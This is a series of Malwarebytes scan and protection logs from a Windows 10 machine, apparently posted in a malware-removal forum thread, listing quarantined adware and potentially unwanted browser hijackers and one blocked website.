PUP.Optional.StartPage, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{09D44C2A-F732-482A-9D07-60B1ECD11A01}, Quarantined, [40], [474793],1.0.3611
PUP.Optional.hTab, HKLM\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\ELMKJJFKKCHOHAAOLJOBAFFJEEDCOOCJ, Quarantined, [15018], [460276],1.0.3611
PUP.Optional.hTab, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\ELMKJJFKKCHOHAAOLJOBAFFJEEDCOOCJ, Quarantined, [15018], [460276],1.0.3611
PUP.Optional.hTab, HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\elmkjjfkkchohaaoljobaffjeedcoocj, Quarantined, [15018], [460276],1.0.3611
PUP.Optional.SearchManager, HKLM\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\NAHHMPBCKPGDIDFNMFKFGIFLPJIJILCE, Quarantined, [489], [440037],1.0.3611
PUP.Optional.SearchManager, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\NAHHMPBCKPGDIDFNMFKFGIFLPJIJILCE, Quarantined, [489], [440037],1.0.3611
PUP.Optional.SearchManager, HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\nahhmpbckpgdidfnmfkfgiflpjijilce, Quarantined, [489], [440037],1.0.3611
PUP.Optional.SearchManager, HKLM\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\PILPLLOABDEDFMIALNFCHJOMJMPJCOEJ, Quarantined, [489], [183362],1.0.3611
PUP.Optional.SearchManager, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\PILPLLOABDEDFMIALNFCHJOMJMPJCOEJ, Quarantined, [489], [183362],1.0.3611
PUP.Optional.SearchManager, HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\pilplloabdedfmialnfchjomjmpjcoej, Quarantined, [489], [183362],1.0.3611
PUP.Optional.WinYahoo, HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, Quarantined, [58], [182758],1.0.3611
PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, Quarantined, [58], [182758],1.0.3611
PUP.Optional.WinYahoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}, Quarantined, [58], [182758],1.0.3611
PUP.Optional.WinYahoo, HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{A62ABDEE-78A2-4DDB-9355-1C334ABD6E43}, Quarantined, [58], [182758],1.0.3611
PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{A62ABDEE-78A2-4DDB-9355-1C334ABD6E43}, Quarantined, [58], [182758],1.0.3611
PUP.Optional.WinYahoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{a62abdee-78a2-4ddb-9355-1c334abd6e43}, Quarantined, [58], [182758],1.0.3611
PUP.Optional.MailRu, HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}, Quarantined, [635], [382913],1.0.3611
PUP.Optional.MailRu, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\bhjhnafpiilpffhglajcaepjbnbjemci, Quarantined, [635], [448286],1.0.3611
PUP.Optional.MailRu, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\hcadgijmedbfgciegjomfpjcdchlhnif, Quarantined, [635], [403165],1.0.3611
PUP.Optional.WinYahoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{5B47B387-0BC7-6207-BA47-12876AC7C107}, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{4846A086-18C6-7106-A946-018679C6D206}, Quarantined, [58], [302717],1.0.3611
 
Registry Value: 11
PUP.Optional.WinYahoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|URL, Quarantined, [58], [182758],1.0.3611
PUP.Optional.WinYahoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{a62abdee-78a2-4ddb-9355-1c334abd6e43}|URL, Quarantined, [58], [182758],1.0.3611
PUP.Optional.NotChromeRun, HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|CHROMIUM, Quarantined, [1343], [391151],1.0.3611
PUP.Optional.WinYahoo, HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|URL, Quarantined, [58], [182757],1.0.3611
PUP.Optional.MailRu, HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}|URL, Quarantined, [635], [382913],1.0.3611
PUP.Optional.MailRu, HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}|FAVICONURLFALLBACK, Quarantined, [635], [382913],1.0.3611
PUP.Optional.MailRu, HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}|SUGGESTIONSURL, Quarantined, [635], [382913],1.0.3611
PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|URL, Quarantined, [58], [182758],1.0.3611
PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{a62abdee-78a2-4ddb-9355-1c334abd6e43}|URL, Quarantined, [58], [182758],1.0.3611
PUP.Optional.StartPage, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{09D44C2A-F732-482A-9D07-60B1ECD11A01}|PATH, Quarantined, [40], [474794],1.0.3611
PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{BBA5791A-0D72-4917-8082-E0C646CDBFCD}|PATH, Quarantined, [58], [308967],1.0.3611
 
Registry Data: 1
PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|START PAGE, Replaced, [58], [293461],1.0.3611
 
Data Stream: 0
(No malicious items detected)
 
Folder: 7
PUP.Optional.WinYahoo.TskLnk, C:\PROGRAMDATA\{959150F2-1FD3-DA34-9915-44760357CFB8}, Quarantined, [495], [453921],1.0.3611
PUP.Optional.WinYahoo.TskLnk, C:\USERS\OUROBOROS\APPDATA\LOCAL\447123AD-7416-1893-A863-7ED1A81B6B4D, Quarantined, [495], [455040],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\HowToRemove, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\USERS\OUROBOROS\APPDATA\LOCAL\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\HowToRemove, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\USERS\OUROBOROS\APPDATA\LOCAL\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}, Quarantined, [58], [302717],1.0.3611
PUP.Optional.PriceFountain.TskLnk, C:\USERS\OUROBOROS\APPDATA\LOCAL\NOBBLEABSORBS, Quarantined, [8266], [431028],1.0.3611
 
File: 95
PUP.Optional.SearchManager, C:\USERS\OUROBOROS\APPDATA\LOCAL\CHROMIUM\USER DATA\DEFAULT\LOCAL STORAGE\chrome-extension_pilplloabdedfmialnfchjomjmpjcoej_0.localstorage, Quarantined, [489], [260989],1.0.3611
PUP.Optional.WinYahoo, C:\WINDOWS\TASKS\Yahoo! Powered fisal.job, Quarantined, [58], [308966],1.0.3611
PUP.Optional.WinYahoo, C:\WINDOWS\SYSTEM32\TASKS\Yahoo! Powered fisal, Quarantined, [58], [308969],1.0.3611
PUP.Optional.SearchManager, C:\USERS\OUROBOROS\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\LOCAL STORAGE\chrome-extension_pilplloabdedfmialnfchjomjmpjcoej_0.localstorage, Quarantined, [489], [453138],1.0.3611
PUP.Optional.WinYahoo.TskLnk, C:\PROGRAMDATA\{959150F2-1FD3-DA34-9915-44760357CFB8}\mimi.txt, Quarantined, [495], [453921],1.0.3611
PUP.Optional.WinYahoo.TskLnk, C:\ProgramData\{959150F2-1FD3-DA34-9915-44760357CFB8}\aowLC, Quarantined, [495], [453921],1.0.3611
PUP.Optional.WinYahoo.TskLnk, C:\ProgramData\{959150F2-1FD3-DA34-9915-44760357CFB8}\codafa, Quarantined, [495], [453921],1.0.3611
PUP.Optional.WinYahoo.TskLnk, C:\ProgramData\{959150F2-1FD3-DA34-9915-44760357CFB8}\dimica, Quarantined, [495], [453921],1.0.3611
PUP.Optional.WinYahoo.TskLnk, C:\ProgramData\{959150F2-1FD3-DA34-9915-44760357CFB8}\hdat1, Quarantined, [495], [453921],1.0.3611
PUP.Optional.WinYahoo.TskLnk, C:\ProgramData\{959150F2-1FD3-DA34-9915-44760357CFB8}\hdat2, Quarantined, [495], [453921],1.0.3611
PUP.Optional.WinYahoo.TskLnk, C:\ProgramData\{959150F2-1FD3-DA34-9915-44760357CFB8}\Hvpjd, Quarantined, [495], [453921],1.0.3611
PUP.Optional.WinYahoo.TskLnk, C:\WINDOWS\SYSTEM32\TASKS\Yahoo! Powered fisal, Quarantined, [495], [-1],0.0.0
PUP.Optional.WinYahoo.TskLnk, C:\WINDOWS\SYSTEM32\TASKS\{447123AD-7416-1893-A863-7ED1A81B6B4D}, Quarantined, [495], [455040],1.0.3611
PUP.Optional.WinYahoo.TskLnk, C:\USERS\OUROBOROS\APPDATA\LOCAL\447123AD-7416-1893-A863-7ED1A81B6B4D\Sync.exe, Quarantined, [495], [455040],1.0.3611
PUP.Optional.WinYahoo.TskLnk, C:\Users\ouroboros\AppData\Local\447123AD-7416-1893-A863-7ED1A81B6B4D\info.dat, Quarantined, [495], [455040],1.0.3611
PUP.Optional.WinYahoo.TskLnk, C:\Users\ouroboros\AppData\Local\447123AD-7416-1893-A863-7ED1A81B6B4D\STTL.DAT, Quarantined, [495], [455040],1.0.3611
PUP.Optional.WinYahoo.TskLnk, C:\Users\ouroboros\AppData\Local\447123AD-7416-1893-A863-7ED1A81B6B4D\TTL.DAT, Quarantined, [495], [455040],1.0.3611
PUP.Optional.WinYahoo.TskLnk, C:\WINDOWS\SYSTEM32\TASKS\{447123AD-7416-1893-A863-7ED1A81B6B4D}, Quarantined, [495], [-1],0.0.0
PUP.Optional.StartPage, C:\WINDOWS\SYSTEM32\TASKS\BLTOPNCOMHOHOJ, Quarantined, [40], [474793],1.0.3611
PUP.Optional.hTab, C:\USERS\OUROBOROS\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Removal Failed, [15018], [460276],1.0.3611
PUP.Optional.SearchManager, C:\USERS\OUROBOROS\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Removal Failed, [489], [440037],1.0.3611
PUP.Optional.SearchManager, C:\USERS\OUROBOROS\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Removal Failed, [489], [183362],1.0.3611
PUP.Optional.WinYahoo, C:\USERS\OUROBOROS\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\IUFRUQDN.DEFAULT\SEARCHPLUGINS\YHS.XML, Quarantined, [58], [457864],1.0.3611
PUP.Optional.MailRu, C:\USERS\OUROBOROS\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Removal Failed, [635], [448286],1.0.3611
PUP.Optional.MailRu, C:\USERS\OUROBOROS\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Removal Failed, [635], [403165],1.0.3611
PUP.Optional.WinYahoo, C:\USERS\OUROBOROS\APPDATA\LOCAL\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\HOWTOREMOVE\HOWTOREMOVE.HTML, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\HowToRemove\chromium-min.jpg, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\HowToRemove\control panel-min-min.JPG, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\HowToRemove\down.png, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\HowToRemove\ff menu.JPG, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\HowToRemove\ff search engine-min.png, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\HowToRemove\hp-min ff.png, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\HowToRemove\hp-min ie.png, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\HowToRemove\search engine.gif, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\HowToRemove\setup pages.gif, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\HowToRemove\sp-min.png, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\HowToRemove\start-min.jpg, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\HowToRemove\up.png, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\cidemonet.dat, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\didarec.cfg, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\dofeno, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\install.log, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\latecole, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\lifosoto.dat, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\lilenil.dat, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\racetodet, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\somalicot, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\Sqlite3.dll, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\titeca.dat, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\uninst.dat, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\uninst.exe, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{8210B44C-A6B8-D8F4-CB20-FD1CEF480184}\uninstp.dat, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\USERS\OUROBOROS\APPDATA\LOCAL\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\HOWTOREMOVE\HOWTOREMOVE.HTML, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\HowToRemove\chromium-min.jpg, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\HowToRemove\control panel-min-min.JPG, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\HowToRemove\down.png, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\HowToRemove\ff menu.JPG, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\HowToRemove\ff search engine-min.png, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\HowToRemove\hp-min ff.png, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\HowToRemove\hp-min ie.png, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\HowToRemove\search engine.gif, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\HowToRemove\setup pages.gif, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\HowToRemove\sp-min.png, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\HowToRemove\start-min.jpg, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\HowToRemove\up.png, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\cifatafe, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\install.log, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\latecole, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\lifosoto.dat, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\lilenil.dat, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\racetodet, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\somalicot, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\Sqlite3.dll, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\titeca.dat, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\uninst.dat, Quarantined, [58], [302717],1.0.3611
PUP.Optional.WinYahoo, C:\Users\ouroboros\AppData\Local\{FCD3CA8F-D87B-A637-B5E3-83DF918B7F47}\uninst.exe, Quarantined, [58], [302717],1.0.3611
PUP.Optional.PriceFountain.TskLnk, C:\USERS\OUROBOROS\APPDATA\LOCAL\NOBBLEABSORBS\RKEY.DAT, Quarantined, [8266], [431028],1.0.3611
PUP.Optional.PriceFountain.TskLnk, C:\Users\ouroboros\AppData\Local\NobbleAbsorbs\Aliexpress .lnk, Quarantined, [8266], [431028],1.0.3611
PUP.Optional.PriceFountain.TskLnk, C:\Users\ouroboros\AppData\Local\NobbleAbsorbs\Aliexpress.ico, Quarantined, [8266], [431028],1.0.3611
PUP.Optional.PriceFountain.TskLnk, C:\Users\ouroboros\AppData\Local\NobbleAbsorbs\Aliexpress.lnk, Quarantined, [8266], [431028],1.0.3611
PUP.Optional.PriceFountain.TskLnk, C:\Users\ouroboros\AppData\Local\NobbleAbsorbs\Aliexpress.smenu.URL, Quarantined, [8266], [431028],1.0.3611
PUP.Optional.PriceFountain.TskLnk, C:\Users\ouroboros\AppData\Local\NobbleAbsorbs\Aliexpress.tbar.URL, Quarantined, [8266], [431028],1.0.3611
PUP.Optional.PriceFountain.TskLnk, C:\Users\ouroboros\AppData\Local\NobbleAbsorbs\AweatherSciatic.dat, Quarantined, [8266], [431028],1.0.3611
PUP.Optional.PriceFountain.TskLnk, C:\Users\ouroboros\AppData\Local\NobbleAbsorbs\Booking .lnk, Quarantined, [8266], [431028],1.0.3611
PUP.Optional.PriceFountain.TskLnk, C:\Users\ouroboros\AppData\Local\NobbleAbsorbs\Booking.ico, Quarantined, [8266], [431028],1.0.3611
PUP.Optional.PriceFountain.TskLnk, C:\Users\ouroboros\AppData\Local\NobbleAbsorbs\Booking.lnk, Quarantined, [8266], [431028],1.0.3611
PUP.Optional.PriceFountain.TskLnk, C:\Users\ouroboros\AppData\Local\NobbleAbsorbs\Booking.smenu.URL, Quarantined, [8266], [431028],1.0.3611
PUP.Optional.PriceFountain.TskLnk, C:\Users\ouroboros\AppData\Local\NobbleAbsorbs\Booking.tbar.URL, Quarantined, [8266], [431028],1.0.3611
Adware.FileTour, C:\USERS\OUROBOROS\APPDATA\LOCAL\TEMP\IS-DTF68.TMP\KAV2.DLL, Quarantined, [150], [423225],1.0.3611
Adware.FileTour, C:\USERS\OUROBOROS\APPDATA\LOCAL\TEMP\IS-082E9.TMP\58541165, Quarantined, [150], [423225],1.0.3611
Adware.FileTour, C:\USERS\OUROBOROS\APPDATA\LOCAL\TEMP\12711379.EXE, Quarantined, [150], [474039],1.0.3611
Adware.FileTour, C:\USERS\OUROBOROS\APPDATA\LOCAL\TEMP\IS-082E9.TMP\E1E735E0, Quarantined, [150], [413261],1.0.3611
Adware.FileTour, C:\USERS\OUROBOROS\APPDATA\LOCAL\TEMP\BIT5D01.TMP, Quarantined, [150], [474039],1.0.3611
PUP.Optional.GameHack, C:\PROGRAM FILES (X86)\CHEAT ENGINE 6.7\STANDALONEPHASE1.DAT, Quarantined, [663], [393793],1.0.3611
CheatTool.CETTrainer, C:\USERS\OUROBOROS\DOCUMENTS\STARDEW VALLEY V2.27.2016 TRAINER +5 MRANTIFUN.EXE, Quarantined, [7793], [116813],1.0.3611
 
Physical Sector: 0
(No malicious items detected)
 
 
(end)
 
Malwarebytes
www.malwarebytes.com
 
-Log Details-
Scan Date: 1/3/18
Scan Time: 8:27 PM
Log File: 7597275c-f081-11e7-be9d-2c56dc0b4679.json
Administrator: Yes
 
-Software Information-
Version: 3.3.1.2183
Components Version: 1.0.262
Update Package Version: 1.0.3614
License: Trial
 
-System Information-
OS: Windows 10 (Build 16299.125)
CPU: x64
File System: NTFS
User: ENJAY\ouroboros
 
-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 379844
Threats Detected: 1
Threats Quarantined: 1
Time Elapsed: 8 min, 23 sec
 
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect
 
-Scan Details-
Process: 0
(No malicious items detected)
 
Module: 0
(No malicious items detected)
 
Registry Key: 0
(No malicious items detected)
 
Registry Value: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Data Stream: 0
(No malicious items detected)
 
Folder: 0
(No malicious items detected)
 
File: 1
Adware.FileTour, C:\USERS\OUROBOROS\APPDATA\LOCAL\TEMP\BIT47DA.TMP, Quarantined, [150], [474039],1.0.3614
 
Physical Sector: 0
(No malicious items detected)
 
 
(end)
 
Malwarebytes
www.malwarebytes.com
 
-Log Details-
Protection Event Date: 1/4/18
Protection Event Time: 5:50 PM
Log File: c3586b3c-f134-11e7-a6f2-2c56dc0b4679.json
Administrator: Yes
 
-Software Information-
Version: 3.3.1.2183
Components Version: 1.0.262
Update Package Version: 1.0.3619
License: Trial
 
-System Information-
OS: Windows 10 (Build 16299.125)
CPU: x64
File System: NTFS
User: System
 
-Blocked Website Details-
Malicious Website: 1
, , Blocked, [-1], [-1],0.0.0
 
-Website Data-
Category: Unspecified
Domain: link.safecart.com
IP Address: 45.64.64.38
Port: [49861]
Type: Outbound
File: C:\Users\ouroboros\AppData\Local\Google\Chrome\Application\chrome.exe
 
 
 
(end)
 
Malwarebytes
www.malwarebytes.com
 
-Log Details-
Scan Date: 1/3/18
Scan Time: 8:19 PM
Log File: 4f582970-f080-11e7-b36b-2c56dc0b4679.json
Administrator: Yes
 
-Software Information-
Version: 3.3.1.2183
Components Version: 1.0.262
Update Package Version: 1.0.3614
License: Trial
 
-System Information-
OS: Windows 10 (Build 16299.125)
CPU: x64
File System: NTFS
User: ENJAY\ouroboros
 
-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 379860
Threats Detected: 1
Threats Quarantined: 1
Time Elapsed: 5 min, 20 sec
 
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect
 
-Scan Details-
Process: 0
(No malicious items detected)
 
Module: 0
(No malicious items detected)
 
Registry Key: 0
(No malicious items detected)
 
Registry Value: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Data Stream: 0
(No malicious items detected)
 
Folder: 0
(No malicious items detected)
 
File: 1
Adware.FileTour, C:\USERS\OUROBOROS\APPDATA\LOCAL\TEMP\BIT47DA.TMP, Quarantined, [150], [474039],1.0.3614
 
Physical Sector: 0
(No malicious items detected)
 
 
(end)
 
 


#6 Aura

Aura

